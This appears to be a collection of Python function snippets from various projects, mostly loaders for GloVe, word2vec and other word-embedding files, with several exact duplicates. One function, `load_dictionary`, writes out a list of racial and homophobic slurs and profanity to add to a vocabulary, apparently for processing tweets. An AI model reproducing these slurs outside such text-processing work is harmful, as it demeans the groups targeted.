"def load_vectors(path, to_train=False):\n model = Word2Vec.load(path)\n\n if to_train:\n return model\n\n # In case it doesn't need to be trained, delete train code to free up ram\n word_vectors = model.wv\n\n context_vectors = dict()\n if hasattr(model, \"syn1\"):\n # For hierarchical softmax\n context_vectors = model.syn1\n elif hasattr(model, \"syn1neg\"):\n # For negative sampling\n context_vectors = model.syn1neg\n\n del model # Save memory\n return VectorCollection(word_vectors, context_vectors)",
"def load_word2vec(emb_path, id_to_word, word_dim, old_weights):\n new_weights = old_weights\n print('Loading pretrained embeddings from {}...'.format(emb_path))\n pre_trained = {}\n emb_invalid = 0\n for i, line in enumerate(codecs.open(emb_path, 'r', 'utf-8')):\n line = line.rstrip().split()\n if len(line) == word_dim + 1:\n pre_trained[line[0]] = np.array(\n [float(x) for x in line[1:]]\n ).astype(np.float32)\n else:\n emb_invalid += 1\n if emb_invalid > 0:\n print('WARNING: %i invalid lines' % emb_invalid)\n c_found = 0\n c_lower = 0\n c_zeros = 0\n n_words = len(id_to_word)\n # Lookup table initialization\n for i in range(n_words):\n word = id_to_word[i]\n if word in pre_trained:\n new_weights[i] = pre_trained[word]\n c_found += 1\n elif word.lower() in pre_trained:\n new_weights[i] = pre_trained[word.lower()]\n c_lower += 1\n elif re.sub('\\d', '0', word.lower()) in pre_trained:\n new_weights[i] = pre_trained[\n re.sub('\\d', '0', word.lower())\n ]\n c_zeros += 1\n print('Loaded %i pretrained embeddings.' % len(pre_trained))\n print('%i / %i (%.4f%%) words have been initialized with '\n 'pretrained embeddings.' % (\n c_found + c_lower + c_zeros, n_words,\n 100. * (c_found + c_lower + c_zeros) / n_words)\n )\n print('%i found directly, %i after lowercasing, '\n '%i after lowercasing + zero.' % (\n c_found, c_lower, c_zeros\n ))\n return new_weights",
"def load_vocab(fn):\n return corpora.Dictionary.load(fn)",
"def load_bin_vec(self, fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n print header\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32')\n # logger.info(word_vecs[word])\n else:\n f.read(binary_len)\n # logger.info(\"num words already in word2vec: \" + str(len(word_vecs)))\n return word_vecs",
"def load_embeddings(filepath, vocabulary, retain):\n \n word2index = dict()\n word_vectors = list()\n\n def add_entry(word, vector):\n word2index[word] = len(word2index)\n word_vectors.append(vector)\n\n model = gensim.models.KeyedVectors.load(filepath)\n\n # adding special tokens <FIL>, <UNK> and <NUM>\n dim = model.vector_size\n add_entry('<fil>', np.zeros((dim,)))\n for special in ['<unk>', '<num>']:\n vector = np.random.uniform(-0.025, 0.025, (dim,))\n add_entry(special, vector)\n\n if retain:\n for word, _ in model.vocab.items():\n add_entry(word, model[word])\n else:\n for word in vocabulary:\n if word in model:\n add_entry(word, model[word])\n\n vocabulary = vocabulary.intersection(word2index.keys())\n return word2index, np.asarray(word_vectors)",
"def load_embedding_file(self):\n if self.language == 'en':\n embed_file_dir = self.embedding_path\n wv = KeyedVectors.load_word2vec_format(embed_file_dir, binary=True)\n self.pretrained_embedding = {}\n for word in wv.vocab.keys():\n normalized_word = normalization.process(self.language.upper(), word, letters_to_keep='', letters_to_remove='',\n lowercase=True, remove_repetitions_count=-1, remove_punct=True,\n remove_digits=True, remove_vowels=False, remove_diacritics=True,\n remove_spaces=False, remove_apostrophe=True, copy_through=False,\n keep_romanized_text=False)\n self.pretrained_embedding[normalized_word] = wv[word]\n self.embed_dim = 300\n\n else:\n embed_file_dir = self.embedding_path\n fin = open(embed_file_dir, 'r', encoding='utf-8', newline='\\n', errors='ignore')\n data = {}\n for line in fin:\n if len(line.split()) == 2: # header\n continue\n tokens = line.rstrip().split(' ')\n word = tokens[0]\n normalized_word = normalization.process(self.language.upper(), word, letters_to_keep='', letters_to_remove='',\n lowercase=True, remove_repetitions_count=-1, remove_punct=True,\n remove_digits=True, remove_vowels=False, remove_diacritics=True,\n remove_spaces=False, remove_apostrophe=True, copy_through=False,\n keep_romanized_text=False)\n data[normalized_word] = np.array(tokens[1:])\n self.pretrained_embedding = data\n self.embed_dim = 300",
"def load_embedding(fpath, VOCAB):\n print(\"Loading embeddings...\")\n emb = dict()\n wv_from_bin = KeyedVectors.load_word2vec_format(fpath, limit=VOCAB)\n for word, vector in tqdm(zip(wv_from_bin.vocab, wv_from_bin.vectors)):\n coefs = np.asarray(vector, dtype='float32')\n if word not in emb:\n emb[word] = coefs\n return emb",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word).lower()\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs",
"def load_embeddings(path, vocab, source_domain, target_domain, emb_name):\n\n pkl = './work/embeddings/%s_%s_%s.pkl' % (source_domain, target_domain, emb_name)\n if os.path.exists(pkl):\n print(\"Load embeddings from existing pkl file %s...\" % pkl)\n # word embeddings weights have been loaded\n embeddings = pickle.load(open(pkl, 'rb'))\n else:\n print(\"Load embedding from %s...\" % path)\n raw_embeddings = {}\n if emb_name == 'yelp_electronics':\n with open(path) as fp:\n for line in fp:\n word_vector = line.split(\",\")[:-1]\n vector_list = []\n for element in word_vector[len(word_vector) - 100:]:\n vector_list.append(float(element))\n word = ','.join(word_vector[:len(word_vector) - 100])\n vector = np.asarray(vector_list)\n if word in vocab:\n raw_embeddings[word] = vector\n else:\n with open(path) as fp:\n for line in fp:\n eles = line.strip().split(' ')\n word = eles[0]\n if word in vocab:\n raw_embeddings[word] = eles[1:]\n\n dim_w = len(raw_embeddings['the'])\n n_words = len(vocab)\n embeddings = np.zeros(shape=(n_words, dim_w))\n for w in vocab:\n wid = vocab[w]\n if w in raw_embeddings:\n embeddings[wid] = np.array([float(ele) for ele in raw_embeddings[w]])\n else:\n # for OOV words, add random initialization\n embeddings[wid] = np.random.uniform(-0.25, 0.25, dim_w)\n print(\"Find %s word embeddings...\" % len(embeddings))\n if not os.path.exists('./work/embeddings'):\n os.mkdir('./work/embeddings')\n emb_path = './work/embeddings/%s_%s_%s.pkl' % (source_domain, target_domain, emb_name)\n # write the embedding weights back to the disk\n pickle.dump(embeddings, open(emb_path, 'wb'))\n embeddings = np.array(embeddings, dtype='float32')\n return embeddings",
"def read_word2vec_model():\n file_name = \"word2vec_model.txt\"\n # these are the pre-2018 lines to load a model:\n # from gensim.models.word2vec import Word2Vec\n # m = Word2Vec.load_word2vec_format(file_name, binary=False)\n \n # here are the post-2018 lines to load a model:\n from gensim.models import KeyedVectors\n print(\"Starting to load the model in \", file_name, \"...\")\n m = KeyedVectors.load_word2vec_format(file_name, binary=False)\n print(\"Model loaded.\\n\")\n\n print(\"The model built is\", m, \"\\n\")\n print(\"m.vocab has\", len(m.vocab), \"words\")\n ## The above line should print\n ## m.vocab has 43981 words\n\n print(\"Each word is a vector of size\", m.vector_size)\n ## which should tells us that each word is represented by a 300-dimensional vector\n\n print(\"\\nTry m.get_vector('hello') to see one...!\\n\")\n ## Once the model is built, it can't be changed without rebuilding it; we'll leave it. \n\n return m",
"def load_vectors(fname):\r\n # taken from: https://fasttext.cc/docs/en/english-vectors.html\r\n vectors_data = vocab.Vectors(name=fname)\r\n\r\n return vectors_data",
"def get_vocab(self):\n if os.path.exists(self.vocab_file) & self.vocab_from_file:\n f = open(self.vocab_file, \"rb\")\n vocab = pickle.load(f)\n self.word2idx = vocab.word2idx\n self.idx2word = vocab.idx2word\n f.close()\n else:\n self.build_vocab()\n with open(self.vocab_file, 'wb') as f:\n pickle.dump(self, f)",
"def load_vecs():\n global VECTORIZER\n global CECTORIZER\n\n v_file = os.path.join(TMP_DIR, 'vectorizer.pickle')\n d_file = os.path.join(TMP_DIR, 'dectorizer.pickle')\n f_file = os.path.join(TMP_DIR, 'freq.pickle')\n\n if os.path.isfile(v_file) and os.path.isfile(d_file):\n with open(v_file, 'rb') as f:\n VECTORIZER = pickle.load(f)\n with open(d_file, 'rb') as f:\n CECTORIZER = pickle.load(f)\n return True\n\n return False",
"def load_glove(path):\n with open(path) as f:\n glove = {}\n for line in f.readlines():\n values = line.split()\n word = values[0]\n vector = np.array(values[1:], dtype='float32')\n glove[word] = vector\n return glove",
"def load_glove(path):\n with open(path) as f:\n glove = {}\n for line in f.readlines():\n values = line.split()\n word = values[0]\n vector = np.array(values[1:], dtype='float32')\n glove[word] = vector\n return glove",
"def _load_glove_vec(fname, vocab):\n print 'load glove...'\n word_vecs = {}\n cnt = 0\n l = open(fname,'r').readline()\n embedding_size = len(l.strip().split()) -1\n print 'embedding vector size: %d'%(embedding_size)\n with open(fname, \"r\") as f:\n for l in f:\n stemp = l.strip().split(' ',1)\n assert len(stemp) == 2\n word = stemp[0]\n if word in vocab:\n word_vecs[stemp[0]] = np.fromstring(' '.join(stemp[1:]),sep = ' ')\n cnt+=1\n if cnt%10000==0:\n print '%d lines...'%cnt\n return (word_vecs,embedding_size)",
"def load_glove_vec(fname):\n word_vecs = {}\n length = 0\n with open(fname, \"rb\") as f:\n for i, line in enumerate(f):\n L = line.split()\n word = L[0].lower()\n word_vecs[word] = np.array(L[1:], dtype='float32')\n if length == 0:\n length = len(word_vecs[word])\n return word_vecs, length",
"def _load_bin_vec(fname, vocab):\n print 'load bin...'\n word_vecs = {}\n cnt = 0\n\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n print 'embedding vocab size: %d , embedding vector size: %d'%(vocab_size,layer1_size)\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32')\n else:\n f.read(binary_len)\n cnt +=1\n if cnt%10000 == 0:\n \tprint '%d lines...'%cnt\n return (word_vecs, layer1_size)",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs",
"def __init__(self, text):\n self.text = text\n self.train_vec = np.load('feat.npy')\n self.train_output = pickle.load(open('mylist.pkl', 'rb'))\n self.vec = pickle.load(open('vector.pkl', 'rb'))",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs",
"def loadGloveDicFromFile():\n \n #if the resource file is not present, creates the file containing all vectors\n #and return vectors\n if not isfile(GLOVE_DICT_FILE):\n vects = _extractGloveVects()\n saveGloveDicIntoFile(vects)\n return vects\n \n return np.load(GLOVE_DICT_FILE)[0]",
"def dep_w2v(data_fname='deps.words', out_fname='depw2v.pkl'):\n M = np.loadtxt(DATA_DIR + data_fname, converters={0: lambda x: 0})\n M = M[:, 1:]\n print \"Loaded {0}x{1} word vector matrix\".format(*M.shape)\n with open(DATA_DIR + data_fname, 'rb') as f:\n words = [line.split()[0] for line in f]\n with open(DATA_DIR + out_fname, 'wb') as f:\n cPickle.dump((words, M), f)",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs",
"def load_word2vec(word2vec_json_file):\n word2vec = json.load(open(word2vec_json_file, \"r\"))\n print (\"padding \" + str(word2vec[\"padding\"][0]))\n return word2vec",
"def load_dictionary(filename):\n filename = os.path.join(FILE_DIR, 'assets/obj/' + filename)\n try:\n with open(filename, 'rb') as input:\n return pickle.load(input)\n except Exception as e:\n print(\"exception\", e)",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n # print(vocab_size)\n for line in range(vocab_size):\n # print(line)\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n # print(word)\n if word in vocab:\n # print(word)\n word_vecs[word] = np.frombuffer(f.read(binary_len), dtype='float32')\n else:\n f.read(binary_len)\n\n return word_vecs",
"def _load_word_embedding(self, lang):\n dict_fold = 'train' # which fold of the data will be used to produce results\n if self.args.task == 'conneau' or self.args.task == 'xling':\n data_dir = os.path.join(self.args.data_dir, 'MUSE')\n lang_path = os.path.join(data_dir, 'wiki.' + lang + '.vec')\n elif self.args.task == 'dinu':\n data_dir = os.path.join(self.args.data_dir, 'dinu')\n lang_path = os.path.join(data_dir, 'embeddings', lang + '.emb.txt')\n elif self.args.task == 'zhang':\n order = [lang,trg]\n if lang == 'en':\n order = order[::-1]\n data_dir = os.path.join(self.args.home_dir,'pkg/UBiLexAT/data/','-'.join(order))\n lang_path = os.path.join(data_dir, 'word2vec.' + lang)\n\n langfile = open(lang_path, encoding=self.args.encoding, errors='surrogateescape')\n words, xs = embeddings.read(langfile, self.args.maxs)\n langfile.close()\n # Build word to index map\n word2ind = {word: i for i, word in enumerate(words)}\n\n return xs, words, word2ind",
"def add_vector(self, name, text, tag=None):\n words = self.clean_text_util.clean_text(text)\n \n # max{f(w,d) : w ∈ d)}\n counter = Counter(words)\n _, max_occ = counter.most_common(1)[0] \n\n # remove duplicate word\n words = set(words)\n \n items = []\n for word in words:\n pickle_wordinfo = self.dictionary_db.get(word)\n if not pickle_wordinfo:\n continue\n \n word_info = pickle.loads(pickle_wordinfo)\n\n # tf formula: tf(f,d) = f(f,d)/max{f(w,d) : w ∈ d)} (src Wikipedia)\n tf = counter[word]/float(max_occ)\n\n # create a new vector item entry\n items.append(VectorItem(word, tf))\n\n # sort the vector item by the dictionary index\n items.sort(key=lambda x: x.word_info(self.dictionary_db).index)\n\n # finally, we create a new vector\n vector = Vector(items, tag)\n self.vectors_db.add(name, pickle.dumps(vector))\n\n # add an empty entry to the norm db\n self.vectors_norm_db.add(name, self.vector_tfidf_norm(items))",
"def construct_embedding(self):\n i = 0\n self.load_dicts()\n embedding_shape = (max(self.word2idx.values()) + 1,\n self.embedding_size)\n self.embedding = np.zeros(embedding_shape)\n\n with open(self.config.word_vec_fi_glove, 'r') as fi:\n for line in fi:\n word_vec = line.split(\" \")[1:]\n self.embedding[i, :] = np.array(word_vec, dtype=np.float32)\n i += 1\n\n self.write_embedding()",
"def create_or_load_slim_w2v(words_list):\n w2v_path = \"w2v_dict.pkl\"\n if not os.path.exists(w2v_path):\n full_w2v = load_word2vec()\n w2v_for_curpos = {k: full_w2v[k] for k in words_list if k in full_w2v}\n w2v_emb_dict = EmbeddingDict(w2v_for_curpos, W2V_EMBEDDING_DIM)\n save_pickle(w2v_emb_dict,w2v_path)\n else:\n w2v_emb_dict = load_pickle(w2v_path)\n return w2v_emb_dict",
"def _load_dict(self, dict_name=None):\n if dict_name is None:\n for name in self.dict_names:\n self._load_dict(name)\n else:\n dict_idx = self.dict_names.index(dict_name)\n if not os.path.exists(self.dict_files[dict_idx]):\n self.logger.warn(\"Not exists %s for %s\" % (\n self.dict_files[dict_idx], dict_name))\n else:\n dict_map = self.dicts[dict_idx]\n id_to_vocab_dict_map = self.id_to_vocab_dict_list[dict_idx]\n if dict_name != self.DOC_LABEL:\n dict_map[self.VOCAB_PADDING] = 0\n dict_map[self.VOCAB_UNKNOWN] = 1\n dict_map[self.VOCAB_PADDING_LEARNABLE] = 2\n id_to_vocab_dict_map[0] = self.VOCAB_PADDING\n id_to_vocab_dict_map[1] = self.VOCAB_UNKNOWN\n id_to_vocab_dict_map[2] = self.VOCAB_PADDING_LEARNABLE\n\n for line in open(self.dict_files[dict_idx], \"r\"):\n vocab = line.strip(\"\\n\").split(\"\\t\")\n dict_idx = len(dict_map)\n dict_map[vocab[0]] = dict_idx\n id_to_vocab_dict_map[dict_idx] = vocab[0]",
"def load_vectors(self, wv_dir=os.getcwd(), wv_type=None, wv_dim=300, unk_init='random'):\n self.unk_init = unk_init\n wv_dict, wv_arr, self.wv_size = load_word_vectors(wv_dir, wv_type, wv_dim)\n self.set_vectors(wv_dict, wv_arr)",
"def load_model(self, file=FILENAME, dim=DIMENSION, normalize=False):\n print(\"Loading pretrained Glove vectors from file {}\".format(FILENAME))\n self.dimension = dim\n self.normalize = normalize\n with open(file, \"r\", encoding=\"utf-8\") as textfile:\n self.num_tokens = count_lines(textfile)\n self.tokens_arr = [\"\" for i in range(self.num_tokens)]\n self.embeddings_mat = np.zeros((self.num_tokens, self.dimension))\n\n for idx, line in enumerate(textfile):\n line = line.split()\n token = ''.join(line[:-self.dimension])\n self.tokens_arr[idx] = token\n self.token_to_idx[token] = idx \n vec = list(map(float, line[-self.dimension:]))\n if self.normalize: \n # normalize the vectors as they are put into the matrix\n vec = vec / np.linalg.norm(vec)\n self.embeddings_mat[idx] = vec \n if (idx+1) % 200000 == 0:\n print(\" --{}% loaded.\".format(round(idx/self.num_tokens*100, 2)))\n print(\"Finished loading Glove model. {} vectors loaded\".format(self.num_tokens))",
"def load(cls, model_path):\n\n # with open(model_path, \"rb\") as f:\n # tfidf_vectorizer = pickle.load(f)\n tfidf_vectorizer = pickle.load(open(model_path, \"rb\"))\n print(type(tfidf_vectorizer))\n\n return tfidf_vectorizer",
"def load_dictionary(location='../data/wordlist.pkl'):\n words = joblib.load(location)\n # Simple plurals not necessary since removed in word correction\n manual_addition = ['sis', 'vixen' ,'ho', 'hoe', 'aint', 'nigga', 'nigger', 'bitch', 'bitches', 'lmao', 'pussy',\n 'fuck', 'fucking', 'fag', 'faggot', 'hater', 'lol', 'yall', 'nfl', 'fucked', 'nips', 'crap',\n 'whitey', 'ghetto', 'mac', 'tho', 'jamming', 'titties', 'dyke', 'fb', 'lmfao', 'bae', 'kanye',\n 'coon', 'smh', 'tweet', 'retweet', 'nbc', 'jk', 'im']\n for word in manual_addition:\n words[word] = 99999 # add word to counter\n return words",
"def load_word_vectors(self, sentence_entry):\n word_vectors = []\n for token, lemma in zip(sentence_entry.tokens, sentence_entry.lemmas):\n # Go through the lookup chain. If one of these is found in the vsm,\n # return it, else use the fallback and report oov\n for s in [token, token.lower(), lemma, lemma.lower()]:\n if self.embeddings.contains_word(s):\n vector = self.embeddings.word_to_vec(s)\n self.statistics.known_token()\n break\n else:\n self.statistics.unknown_token()\n vector = self.embeddings.get_zero_fallback()\n\n word_vectors.append(vector)\n return word_vectors",
"def load_glove_embeddings():\n\n emmbed_file = Path(\"./embeddings.pkl\")\n if emmbed_file.is_file():\n # embeddings already serialized, just load them\n print(\"Local Embeddings pickle found, loading...\")\n with open(\"./embeddings.pkl\", 'rb') as f:\n return pk.load(f)\n else:\n # create the embeddings\n print(\"Building embeddings dictionary...\")\n data = open(\"glove.6B.50d.txt\", 'r', encoding=\"utf-8\")\n embeddings = [[0] * EMBEDDING_SIZE]\n word_index_dict = {'UNK': 0} # first row is for unknown words\n index = 1\n for line in data:\n splitLine = line.split()\n word = tf.compat.as_str(splitLine[0])\n embedding = [float(val) for val in splitLine[1:]]\n embeddings.append(embedding)\n word_index_dict[word] = index\n index += 1\n data.close()\n\n # pickle them\n with open('./embeddings.pkl', 'wb') as f:\n print(\"Creating local embeddings pickle for faster loading...\")\n # Pickle the 'data' dictionary using the highest protocol available.\n pk.dump((embeddings, word_index_dict), f, pk.HIGHEST_PROTOCOL)\n\n return embeddings, word_index_dict",
"def load_glove_vectors(filename, vocab):\n dct = {}\n vectors = array.array('d')\n current_idx = 0\n with open(filename, \"r\", encoding=\"utf-8\") as f:\n for _, line in enumerate(f):\n tokens = line.split(\" \")\n word = tokens[0]\n entries = tokens[1:]\n if not vocab or word in vocab:\n dct[word] = current_idx\n vectors.extend(float(x) for x in entries)\n current_idx += 1\n word_dim = len(entries)\n num_vectors = len(dct)\n return [np.array(vectors).reshape(num_vectors, word_dim), dct]",
"def load_vectors (file_extension = None):\n \n feat_file_name = 'output/' + file_extension + '.feature'\n label_file_name = 'output/' + file_extension + '.label'\n \n prettyPrint( \"Loading feature vectors and labels from disk ... \", color.CYAN)\n if not os.path.isfile(feat_file_name) or not os.path.isfile(label_file_name):\n prettyPrint(\"Feature vector files {0} could not be found. Generating from scratch instead ...\".format(feat_file_name), color.CYAN)\n return None, None\n with open(feat_file_name, 'r') as f:\n feat_vec = pickle.load(f)\n with open(label_file_name, 'r') as f:\n labels = pickle.load(f)\n\n prettyPrint (\"Done loading feature vectors.\", color.CYAN)\n return feat_vec, labels",
"def load_vectors(args):\n dict_fold = 'train' # which fold of the data will be used to produce results\n if args.task == 'conneau' or 'xling':\n data_dir = os.path.join(args.data_dir, 'MUSE')\n dict_dir = os.path.join(data_dir, 'crosslingual/')\n if args.task == 'xling':\n dict_dir = os.path.join(dict_dir, 'xling-dictionaries/bli_datasets/')\n else:\n dict_dir = os.path.join(dict_dir, 'dictionaries/')\n\n src_path = os.path.join(data_dir, 'wiki.' + args.src_lang + '.vec')\n trg_path = os.path.join(data_dir, 'wiki.' + args.trg_lang + '.vec')\n src_freq_path = None\n trg_freq_path = None\n if dict_fold == 'test':\n postfix = '.5000-6500.txt'\n elif dict_fold == 'train':\n postfix = '.0-5000.txt'\n else:\n raise ValueError('Unrecognized dictionary fold for evaluation')\n elif args.task == 'dinu':\n data_dir = os.path.join(args.data_dir,'dinu')\n dict_dir = os.path.join(data_dir, 'dictionaries/')\n src_path = os.path.join(data_dir, 'embeddings', args.src_lang + '.emb.txt')\n trg_path = os.path.join(data_dir, 'embeddings', args.trg_lang + '.emb.txt')\n src_freq_path = None\n trg_freq_path = None\n postfix = '.{}.txt'.format(dict_fold)\n elif args.task == 'zhang':\n order = [args.src_lang,args.trg_lang]\n if args.src_lang == 'en':\n order = order[::-1]\n data_dir = os.path.join(args.home_dir,'pkg/UBiLexAT/data/','-'.join(order))\n dict_dir = data_dir\n src_path = os.path.join(data_dir, 'word2vec.' + args.src_lang)\n trg_path = os.path.join(data_dir, 'word2vec.' + args.trg_lang)\n src_freq_path = os.path.join(data_dir, 'vocab-freq.' + args.src_lang)\n trg_freq_path = os.path.join(data_dir, 'vocab-freq.' + args.trg_lang)\n postfix = '.train.txt'\n\n srcfile = open(src_path, encoding=args.encoding, errors='surrogateescape')\n trgfile = open(trg_path, encoding=args.encoding, errors='surrogateescape')\n src_words, xs = embeddings.read(srcfile, args.maxs)\n trg_words, xt = embeddings.read(trgfile, args.maxt)\n srcfile.close()\n trgfile.close()\n \n if src_freq_path:\n with open(src_freq_path, encoding=args.encoding, errors='surrogateescape') as f:\n lines = [a.split(' ') for a in f.read().strip().split('\\n')]\n freq_src = {k: int(v) for (k,v) in lines}\n\n with open(trg_freq_path, encoding=args.encoding, errors='surrogateescape') as f:\n lines = [a.split(' ') for a in f.read().strip().split('\\n')]\n freq_trg = {k: int(v) for (k,v) in lines}\n\n # Build word to index map\n src_word2ind = {word: i for i, word in enumerate(src_words)}\n trg_word2ind = {word: i for i, word in enumerate(trg_words)}\n\n if args.task == 'zhang':\n dict_path = os.path.join(dict_dir, 'all.' 
+ '-'.join(order) + '.lex')\n flip = False\n elif args.task == 'dinu' and args.src_lang != 'en':\n # Only has dicts in one direction, flip\n dict_path = os.path.join(dict_dir, args.trg_lang + '-' + args.src_lang + postfix)\n src_to_en = os.path.join(dict_dir, 'en' + '-' + args.src_lang + postfix)\n en_to_trg = os.path.join(dict_dir, args.trg_lang + '-' + 'en' + postfix)\n flip = True\n elif args.task == 'xling':\n dict_path = os.path.join(dict_dir, args.src_lang+'-'+args.trg_lang+'/yacle.test.freq.2k.'+args.src_lang+'-' + args.trg_lang + '.tsv')\n src_to_en = os.path.join(dict_dir, args.src_lang+'-'+'en'+'/yacle.test.freq.2k.'+args.src_lang+'-' + 'en' + '.tsv')\n en_to_trg = os.path.join(dict_dir, 'en'+'-'+args.trg_lang+'/yacle.test.freq.2k.'+'en'+'-' + args.trg_lang + '.tsv')\n\n flip = False\n if not os.path.exists(dict_path):\n dict_path = os.path.join(dict_dir, args.trg_lang+'-'+args.src_lang+'/yacle.test.freq.2k.'+args.src_lang+'-' + args.trg_lang + '.tsv')\n flip = True\n\n else:\n src_to_en = os.path.join(dict_dir, args.src_lang + '-' + 'en' + postfix)\n en_to_trg = os.path.join(dict_dir, 'en' + '-' + args.trg_lang + postfix)\n dict_path = os.path.join(dict_dir, args.src_lang + '-' + args.trg_lang + postfix)\n flip = False\n\n\n if not os.path.exists(dict_path):\n # create new dict\n print('Warning: no dict found, creating dictionary')\n create_dict_for(src_to_en, en_to_trg, dict_path, args)\n\n dictf = open(dict_path, encoding=args.encoding, errors='surrogateescape')\n src2trg = collections.defaultdict(set)\n oov = set()\n vocab = set()\n max_srcind = 0 # These are mostly for debug\n max_trgind = 0\n for line in dictf:\n splitted = line.split()\n if len(splitted) > 2:\n # Only using first translation if many are provided\n src, trg = splitted[:2]\n elif len(splitted) == 2:\n src, trg = splitted\n else:\n # No translation? Only happens for Zhang data so far\n continue\n if flip: src, trg = trg, src\n try:\n src_ind = src_word2ind[src]\n trg_ind = trg_word2ind[trg]\n src2trg[src_ind].add(trg_ind)\n vocab.add(src)\n max_srcind = max(max_srcind, src_ind)\n max_trgind = max(max_trgind, trg_ind)\n except KeyError:\n oov.add(src)\n\n return xs, xt, src_words, trg_words, src_word2ind, trg_word2ind, src2trg",
"def load_gloves(self, dir):\n self.word2vec = {}\n glove_file = os.path.join(dir, 'glove.6B.'+str(self.dim_embed)+'d.txt')\n with open(glove_file, encoding=\"utf8\") as f:\n for line in f:\n l = line.split()\n self.word2vec[l[0]] = [float(x) for x in l[1:]]\n self.word2vec[\"<RARE>\"] = [0. for i in range(self.dim_embed)]\n self.word2vec[\"<EMPTY>\"] = [0. for i in range(self.dim_embed)]",
"def load_embeddings(embedding_path):\n print('loading word embeddings from %s' % embedding_path)\n weight_vectors = []\n word_idx = {}\n with codecs.open(embedding_path, encoding='utf-8') as f:\n for line in f:\n word, vec = line.split(u' ', 1)\n word_idx[word] = len(weight_vectors)\n weight_vectors.append(np.array(vec.split(), dtype=np.float32))\n # Annoying implementation detail; '(' and ')' are replaced by '-LRB-' and\n # '-RRB-' respectively in the parse-trees.\n word_idx[u'-LRB-'] = word_idx.pop(u'(')\n word_idx[u'-RRB-'] = word_idx.pop(u')')\n # Random embedding vector for unknown words.\n weight_vectors.append(np.random.uniform(\n -0.05, 0.05, weight_vectors[0].shape).astype(np.float32))\n return np.stack(weight_vectors), word_idx",
"def __init__(self, vector_file='', transform=None):\n self.word2id = {}\n\n # Captures word order, for export() and translate methods\n self.id2word = []\n\n print('reading word vectors from %s' % vector_file)\n with open(vector_file, 'r', errors='ignore') as f:\n line = f.readline()\n header_tokens = line.rstrip('\\n').split(' ')\n if len(header_tokens) == 2:\n self.n_words, self.n_dim = [int(x) for x in header_tokens]\n self.embed = np.zeros((self.n_words, self.n_dim))\n lines = f.read().split('\\n')\n for i, line in enumerate(lines):\n if line == '':\n continue\n elems = line.rstrip('\\n').split(' ')\n self.word2id[elems[0]] = i\n self.embed[i] = elems[1:self.n_dim + 1]\n self.id2word.append(elems[0])\n else:\n self.n_words, self.n_dim = 2196017, 300\n self.embed = np.zeros((self.n_words, self.n_dim))\n self.word2id[header_tokens[0]] = 0\n self.embed[0] = header_tokens[1:self.n_dim + 1]\n self.id2word.append(header_tokens[0])\n for i, line in enumerate(f.read().split('\\n')):\n if line == '':\n continue\n elems = line.rstrip('\\n').split(' ')\n self.word2id[elems[0]] = i+1\n self.embed[i+1] = elems[1:self.n_dim+1]\n self.id2word.append(elems[0])\n\n # Used in translate_inverted_softmax()\n self.softmax_denominators = None\n\n if transform is not None:\n print('Applying transformation to embedding')\n self.apply_transform(transform)",
